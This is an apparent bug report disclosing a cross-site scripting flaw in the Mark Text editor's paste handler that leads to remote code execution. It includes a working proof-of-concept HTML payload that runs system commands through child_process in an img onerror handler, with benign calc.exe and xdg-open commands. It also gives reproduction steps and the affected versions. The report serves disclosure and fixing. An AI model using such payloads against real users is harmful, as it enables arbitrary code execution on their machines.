An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS.
<!-- for windows --><table><tr><imgsrconerror="require('child_process').exec('calc.exe')"></tr></table><!-- for linux (tested with kali) --><table><tr><imgsrconerror="require('child_process').exec('xdg-open .')"></tr></table>
The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script.
Description
An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS.
The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script.
marktext/src/muya/lib/contentState/pasteCtrl.js
Lines 44 to 65 in b029938
Steps to reproduce
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>Expected behavior:
HTML should be sanitized before pasted into DOM.
Actual behavior:
No HTML sanitize procedure. Only checks if it's wrapped with
<table>or not.Link to an example: [optional]
bandicam.2022-02-08.01-33-25-900-cut.mp4
bandicam.2022-02-08.01-33-25-900.mp4
Versions
v0.16.3Windows 11
Version 21H2 - OS Build 22000.469Kali Linux
Kali GNU/Linux Rolling 2021.4The text was updated successfully, but these errors were encountered: